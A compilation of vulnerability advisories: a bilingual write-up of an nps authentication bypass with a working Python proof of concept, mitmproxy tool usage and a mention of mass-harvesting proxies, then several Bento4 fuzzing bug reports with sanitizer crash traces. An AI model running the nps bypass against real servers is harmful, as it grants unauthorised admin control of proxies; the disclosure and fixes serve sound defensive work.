NPS before v0.26.10 was discovered to contain an authentication bypass vulnerability via constantly generating and sending the Auth key and Timestamp parameters.

**nps Authentication Bypass**

*   Affected product: V0.19.0<=nps<=V0.26.10
*   Attack type: Remote
*   Vulnerability Type: Incorrect Access Control
*   Affected component: /nps/web/controllers/base.go
*   Description: nps<=v0.26.10 was discovered to contain a authentication bypass vulnerability via constantly generating and sending the Auth key and Timstamp parameters. Hackers can gain access to proxy information and control traffic through this vulnerability.

**POC**

A tool from github https://github.com/carr0t2/nps-auth-bypass

    python scan.py -u http://1.1.1.1:8080/

**Details**

In /nps/web/controllers/base.go

In /nps/nps.conf

The auth key in the configuration file is annotated by default, so it is empty

Webapi’s auth_key is calculated through the auth_key and timestamp in the configuration file, so you can dynamically generate Webapi’s auth_key

The last to get into the website backstage

**Temporary Fixes**

    sed -i "s/auth_crypt_key =1234567812345678/auth_crypt_key=$(head /dev/urandom | tr -dc a-f0-9 | head -c 16)/" /etc/nps/conf/nps.conf   
    sed -i "s/#auth_key=test/auth_key=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32)/" /etc/nps/conf/nps.conf   

**nps认证绕过漏洞分析****环境搭建**

项目地址 https://github.com/ehang-io/nps

    git clone https://github.com/ehang-io/nps --depth 1
    cd nps
    docker run -it --name nps --net=host -v /root/github/nps/conf:/conf  ffdfgdfg/nps # 记得改挂载路径

**漏洞成因**

> 源于错误的用户配置

nps有web api功能(文档：https://github.com/ehang-io/nps/blob/master/docs/api.md)

该功能默认开启

默认配置如下 /etc/nps/conf/nps.conf:53

    #auth_key=test
    auth_crypt_key =1234567812345678

**影响范围**

V0.19.0<=nps<=V0.26.10

**临时修复方法**

修改配置文件，只有这个才能临时完全修复（网上许多说法讲的不全）

( 去掉auth_key注释 && 修改auth_key为随机字符串 && 修改auth_crypt_key为长度为16的十六进制随机字符串 ) || ( 去掉auth_key注释 && 修改auth_key为随机字符串 && 注释auth_crypt_key)

    sed -i "s/auth_crypt_key =1234567812345678/auth_crypt_key=$(head /dev/urandom | tr -dc a-f0-9 | head -c 16)/" /etc/nps/conf/nps.conf   
    sed -i "s/#auth_key=test/auth_key=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c 32)/" /etc/nps/conf/nps.conf   

**正式修复办法**

（等开发者）

首次运行时生成随机字符串

或者检测auth_key配置为123或为空时,跳到登录页面

**原理分析****代码分析**

在/nps/web/controllers/base.go

32行从url参数中获取auth_key（key和时间戳hash过的结果）

33行从url参数中获取timestamp

34行从配置中获取auth_key，默认配置下，auth_key被注释，所以返回为nil

35行获取当前本地时间戳

36行判断 ( 字符串不等于空字符串 && 当前本地时间与33行时间相差小于20s && 配置文件的authkey与当前时间戳生成的hash与32行传入的auth_key是否相等 )

如果满足的话即可成为admin，进入后台

**构造过程**

那么只需要满足36行的各个条件

第一个 md5Key != "" 恒为真

第二个 时间戳本地实时生成

第三个 因为auth_key默认为空，所以只需要本地对时间戳md5即可

所以构造非常简单，以下为python代码

**poc**

    import requests
    import time
    import hashlib
    
    now_timestamp = str(int(time.time()))
    auth_key = hashlib.md5(now_timestamp.encode()).hexdigest()
    
    burp0_url = f"http://xxx/?auth_key={auth_key}&timestamp={now_timestamp}"
    r = requests.get(burp0_url)
    if "title-admin" in r.text:
        print("Success")

**工具**

假如需要访问web界面进入后台，需要每20s生成timestamp和auth_key

所以这里使用mitmproxy作为中间人，自动生成并插入timestamp和auth_key

我已经写好了工具上传至github https://github.com/carr0t2/nps-auth-bypass

**使用方法**

web端 可以直接在浏览器访问后台

    git clone https://github.com/carr0t2/nps-auth-bypass
    cd nps-auth-bypass
    mitmdump -s main.py -p 8000 --ssl-insecure --mode reverse:http://x.x.x.x:x/

浏览器访问 http://127.0.0.1:8000/

**其他脚本**

可以联动fofax批量获取代理等

CVE-2022-40494: CVE-2022-40494 | Carrot2

Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadBit function in mp4mux.

**Summary**

Hello, I was testing my fuzzer and found three heap buffer overflow bugs in AP4\_Atom::TypeFromString(char const\*), AP4\_BitReader::ReadBit() and AP4\_BitReader::ReadBits(unsigned int). They come from mp4tag and mp4mux, respectively.

**Bug1**

Heap-buffer-overflow on address 0x602000000332 in mp4tag:

    root@728d9sls452:/fuzz-mp4tag/mp4tag# ./mp4tag --remove 1 ../out/crashes/mp4tag_poc_1 /dev/null
    =================================================================
    ==1647110==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000332 at pc 0x000000468f25 bp 0x7fff3510c600 sp 0x7fff3510c5f8
    READ of size 1 at 0x602000000332 thread T0
        #0 0x468f24 in AP4_Atom::TypeFromString(char const*) (/fuzz-mp4tag/mp4tag/mp4tag+0x468f24)
        #1 0x755566 in AP4_MetaData::Entry::FindInIlst(AP4_ContainerAtom*) const (/fuzz-mp4tag/mp4tag/mp4tag+0x755566)
        #2 0x75a3f2 in AP4_MetaData::Entry::RemoveFromFileIlst(AP4_File&, unsigned int) (/fuzz-mp4tag/mp4tag/mp4tag+0x75a3f2)
        #3 0x42fc2c in RemoveTag(AP4_File*, AP4_String&, bool) (/fuzz-mp4tag/mp4tag/mp4tag+0x42fc2c)
        #4 0x418531 in main (/fuzz-mp4tag/mp4tag/mp4tag+0x418531)
        #5 0x7fdb89b2ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #6 0x407f09 in _start (/fuzz-mp4tag/mp4tag/mp4tag+0x407f09)
    
    0x602000000332 is located 0 bytes to the right of 2-byte region [0x602000000330,0x602000000332)
    allocated by thread T0 here:
        #0 0x996920 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fdb8a1a9297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x418531 in main (/fuzz-mp4tag/mp4tag/mp4tag+0x418531)
        #3 0x7fdb89b2ec86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4tag/mp4tag/mp4tag+0x468f24) in AP4_Atom::TypeFromString(char const*)
    Shadow bytes around the buggy address:
      0x0c047fff8010: fa fa fd fd fa fa 04 fa fa fa fd fd fa fa 00 05
      0x0c047fff8020: fa fa 01 fa fa fa 01 fa fa fa fd fa fa fa 03 fa
      0x0c047fff8030: fa fa fd fa fa fa 06 fa fa fa 00 fa fa fa fd fa
      0x0c047fff8040: fa fa 04 fa fa fa fd fd fa fa fd fa fa fa 01 fa
      0x0c047fff8050: fa fa fd fa fa fa 00 00 fa fa 05 fa fa fa 00 00
    =>0x0c047fff8060: fa fa 02 fa fa fa[02]fa fa fa 05 fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1647110==ABORTING
    
    

**Bug2**

Heap-buffer-overflow on address 0x6020000000f8 in mp4mux (AP4\_BitReader::ReadBits):

    root@23iq42wasf35:/fuzz-mp4mux/mp4mux# \./mp4mux --track h264:../out/crashes/id\:000045\,sig\:06\,src\:000002\,op\:int32\,pos\:33\,val\:\+0\,470985 /dev/null
    =================================================================
    ==2473731==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020000000f8 at pc 0x000000649cb8 bp 0x7ffced185f90 sp 0x7ffced185f88
    READ of size 1 at 0x6020000000f8 thread T0
        #0 0x649cb7 in AP4_BitReader::ReadBits(unsigned int) (/fuzz-mp4mux/mp4mux/mp4mux+0x649cb7)
        #1 0x4d6040 in ReadGolomb(AP4_BitReader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6040)
        #2 0x4d6ef9 in AP4_AvcFrameParser::ParsePPS(unsigned char const*, unsigned int, AP4_AvcPictureParameterSet&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6ef9)
        #3 0x4f01dd in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4f01dd)
        #4 0x4ecbf1 in AP4_AvcFrameParser::Feed(void const*, unsigned int, unsigned int&, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ecbf1)
        #5 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5)
        #6 0x7fb87db03c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #7 0x407df9 in _start (/fuzz-mp4mux/mp4mux/mp4mux+0x407df9)
    
    0x6020000000f8 is located 0 bytes to the right of 8-byte region [0x6020000000f0,0x6020000000f8)
    allocated by thread T0 here:
        #0 0xa84ba0 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fb87e17e297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x4f01dd in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4f01dd)
        #3 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5)
        #4 0x7fb87db03c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4mux/mp4mux/mp4mux+0x649cb7) in AP4_BitReader::ReadBits(unsigned int)
    Shadow bytes around the buggy address:
      0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fd
    =>0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa 06 fa fa fa 00[fa]
      0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2473731==ABORTING
    
    

**Bug3**

Heap-buffer-overflow on address 0x602000000158 in mp4mux (AP4\_BitReader::ReadBit):

    root@345sadsf12w332:/fuzz-mp4mux/mp4mux# ./mp4mux --track h264:../out/crashes/id\:000001\,sig\:06\,src\:000002\,op\:flip1\,pos\:8\,10085 /dev/null
    =================================================================
    ==1606856==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000158 at pc 0x00000064a882 bp 0x7ffd08428400 sp 0x7ffd084283f8
    READ of size 1 at 0x602000000158 thread T0
        #0 0x64a881 in AP4_BitReader::ReadBit() (/fuzz-mp4mux/mp4mux/mp4mux+0x64a881)
        #1 0x4d6456 in ReadGolomb(AP4_BitReader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4d6456)
        #2 0x4dcd9e in AP4_AvcFrameParser::ParseSliceHeader(unsigned char const*, unsigned int, unsigned int, unsigned int, AP4_AvcSliceHeader&) (/fuzz-mp4mux/mp4mux/mp4mux+0x4dcd9e)
        #3 0x4ed906 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ed906)
        #4 0x4ecbf1 in AP4_AvcFrameParser::Feed(void const*, unsigned int, unsigned int&, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ecbf1)
        #5 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5)
        #6 0x7fd9e3df9c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #7 0x407df9 in _start (/fuzz-mp4mux/mp4mux/mp4mux+0x407df9)
    
    0x602000000158 is located 0 bytes to the right of 8-byte region [0x602000000150,0x602000000158)
    allocated by thread T0 here:
        #0 0xa84ba0 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7fd9e4474297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x4ed906 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/fuzz-mp4mux/mp4mux/mp4mux+0x4ed906)
        #3 0x4349a5 in main (/fuzz-mp4mux/mp4mux/mp4mux+0x4349a5)
        #4 0x7fd9e3df9c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (/fuzz-mp4mux/mp4mux/mp4mux+0x64a881) in AP4_BitReader::ReadBit()
    Shadow bytes around the buggy address:
      0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c047fff8000: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa fd fd
      0x0c047fff8010: fa fa 00 03 fa fa 06 fa fa fa fd fa fa fa fd fa
    =>0x0c047fff8020: fa fa 06 fa fa fa 07 fa fa fa 00[fa]fa fa fa fa
      0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==1606856==ABORTING
    

**POC**

Bug\_1\_POC.zip  
Bug-2-POC.zip  
Bug-3-POC.zip

**Environment**

Ubuntu 18.04.6 LTS (docker)  
clang 12.0.1  
clang++ 12.0.1  
Bento4 master branch(5b7cc25) && Bento4 release version(1.6.0-639)

**Credit**

Xudong Cao (NCNIPC of China)  
Han Zheng (NCNIPC of China, Hexhive)  
Yuhang Huang (NCNIPC of China)  
Jiayuan Zhang (NCNIPC of China)  
Hao Zhang (NCNIPC of China)

Thank you for your time!

CVE-2022-41430: Some heap-buffer-overflow bugs in Bento4 · Issue #773 · axiomatic-systems/Bento4

Bento4 v1.6.0-639 was discovered to contain a memory leak in the AP4_AvcFrameParser::Feed function in mp4mux.

**Summary**

Hi there,  
These are some faults that maybe lead to serious consequences in mp4xx, the version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker), these binary-crashes with the following.

**Bug1**

Detected memory leaks in mp4spilt:

    root@32345fj4sds:/fuzz-mp4split/mp4split# ./mp4split --video ../out/crashes/poc_split_1
    --video option specified, but no video track found
    
    =================================================================
    ==1889275==ERROR: LeakSanitizer: detected memory leaks
    
    Indirect leak of 592 byte(s) in 2 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x462e2f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462e2f)
        #3 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27)
        #4 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11)
    
    Indirect leak of 256 byte(s) in 1 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x45904a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45904a)
        #3 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f)
        #4 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f)
        #5 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30)
        #6 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558)
        #7 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba)
        #8 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 224 byte(s) in 7 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558)
        #3 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba)
        #4 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 192 byte(s) in 2 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f)
        #3 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f)
        #4 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30)
        #5 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558)
        #6 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba)
        #7 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
    
    Indirect leak of 176 byte(s) in 2 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x46094f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x46094f)
        #3 0x4c4b30 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c4b30)
        #4 0x4c6558 in AP4_File::AP4_File(AP4_ByteStream&, bool) (/fuzz-mp4split/mp4split/mp4split+0x4c6558)
        #5 0x40abba in main (/fuzz-mp4split/mp4split/mp4split+0x40abba)
        #6 0x7f88d878dc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
                                                                                                   …… ……
    
    Indirect leak of 24 byte(s) in 1 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x4bdd4d in AP4_ElstAtom::Create(unsigned int, AP4_ByteStream&) (/fuzz-mp4split/mp4split/mp4split+0x4bdd4d)
        #3 0x45831c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45831c)
        #4 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f)
        #5 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27)
        #6 0x48e726 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x48e726)
        #7 0x45dc8c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x45dc8c)
        #8 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f)
        #9 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27)
        #10 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11)
    
    Indirect leak of 1 byte(s) in 1 object(s) allocated from:
        #0 0x8c7670 in malloc /llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x7f88d8e08297 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libstdc++.so.6+0x93297)
        #2 0x771319 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) (/fuzz-mp4split/mp4split/mp4split+0x771319)
        #3 0x539cf7 in AP4_InitialObjectDescriptor::AP4_InitialObjectDescriptor(AP4_ByteStream&, unsigned char, unsigned int, unsigned int) (/fuzz-mp4split/mp4split/mp4split+0x539cf7)
        #4 0x7713f7 in AP4_DescriptorFactory::CreateDescriptorFromStream(AP4_ByteStream&, AP4_Descriptor*&) (/fuzz-mp4split/mp4split/mp4split+0x7713f7)
        #5 0x4e9d46 in AP4_IodsAtom::Create(unsigned int, AP4_ByteStream&) (/fuzz-mp4split/mp4split/mp4split+0x4e9d46)
        #6 0x4558fa in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x4558fa)
        #7 0x462a0f in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) (/fuzz-mp4split/mp4split/mp4split+0x462a0f)
        #8 0x48ef27 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) (/fuzz-mp4split/mp4split/mp4split+0x48ef27)
        #9 0x490c11 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) (/fuzz-mp4split/mp4split/mp4split+0x490c11)
    
    SUMMARY: AddressSanitizer: 2750 byte(s) leaked in 39 allocation(s).
    
    

**Bug2**

SEGV on unknown address 0x000000000028 in mp4decrypt:

    root@23435332df4:/fuzz-mp4decrypt/mp4decrypt# ./mp4decrypt ../out/crashes/poc_decrypt_1 /dev/null
    WARNING: atom serialized to fewer bytes than declared size
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==2367709==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x0000005da294 bp 0x7ffcee6b84c0 sp 0x7ffcee6b6b60 T0)
    ==2367709==The signal is caused by a READ memory access.
    ==2367709==Hint: address points to the zero page.
        #0 0x5da294 in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&) (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5da294)
        #1 0x5f795d in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5f795d)
        #2 0x414e8b in main (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x414e8b)
        #3 0x7fdba0338c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #4 0x407b69 in _start (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x407b69)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV (/fuzz-mp4decrypt/mp4decrypt/mp4decrypt+0x5da294) in AP4_Processor::ProcessFragments(AP4_MoovAtom*, AP4_List<AP4_AtomLocator>&, AP4_ContainerAtom*, AP4_SidxAtom*, unsigned long long, AP4_ByteStream&, AP4_ByteStream&)
    ==2367709==ABORTING
    
    

**Bug3**

Detected memory leaks in mp4mux:

    root@wha446aq:/# ./Bento4/cmakebuild/mp4mux --track h264:poc_mp4mux_1 /dev/null
    ERROR: Feed() failed (-10)
    
    =================================================================
    ==17429==ERROR: LeakSanitizer: detected memory leaks
    
    Direct leak of 148 byte(s) in 1 object(s) allocated from:
        #0 0x4f5ce8 in operator new(unsigned long) /llvm-project/compiler-rt/lib/asan/asan_new_delete.cpp:99
        #1 0x52d6b2 in AP4_AvcFrameParser::Feed(unsigned char const*, unsigned int, AP4_AvcFrameParser::AccessUnitInfo&, bool) (/Bento4/cmakebuild/mp4mux+0x52d6b2)
    
    SUMMARY: AddressSanitizer: 148 byte(s) leaked in 1 allocation(s).
    

**POC**

Bug\_1\_POC.zip  
Bug\_2\_POC.zip  
Bug\_3\_POC.zip

**Environment**

Ubuntu 18.04.6 LTS (docker)  
clang 12.0.1  
clang++ 12.0.1  
Bento4 master branch(5b7cc25) && Bento4 release version(1.6.0-639)

**Credit**

Xudong Cao (NCNIPC of China)  
Han Zheng (NCNIPC of China, Hexhive)  
Yuhang Huang (NCNIPC of China)  
Jiayuan Zhang (NCNIPC of China)

Thank you for your time!

CVE-2022-41427: Some vulnerabilities about mp4xx can cause serious errors · Issue #772 · axiomatic-systems/Bento4

Bento4 v1.6.0-639 was discovered to contain a memory leak via the AP4_SttsAtom::Create function in mp42hls.

CVE-2022-41424: Detected memory leaks in mp42hls · Issue #768 · axiomatic-systems/Bento4

Bento4 v1.6.0-639 was discovered to contain a segmentation violation in the mp4fragment component.

**Summary**

Hi there, I use my fuzzer for fuzzing the binary mp4fragment, the version of Bento4 is the latest (the newest master branch) and the operation system is Ubuntu 18.04.6 LTS (docker) and this binary crashes with the following.

**Details**

    root@4e3b7f9edc0d:/mp4box/mp4fragment# ./mp4fragment ../out/crashes/id\:000000\,sig\:06\,src\:000008\,op\:flip1\,pos\:31325\,4970731 /dev/null
    unable to autodetect fragment duration, using default
    AddressSanitizer:DEADLYSIGNAL
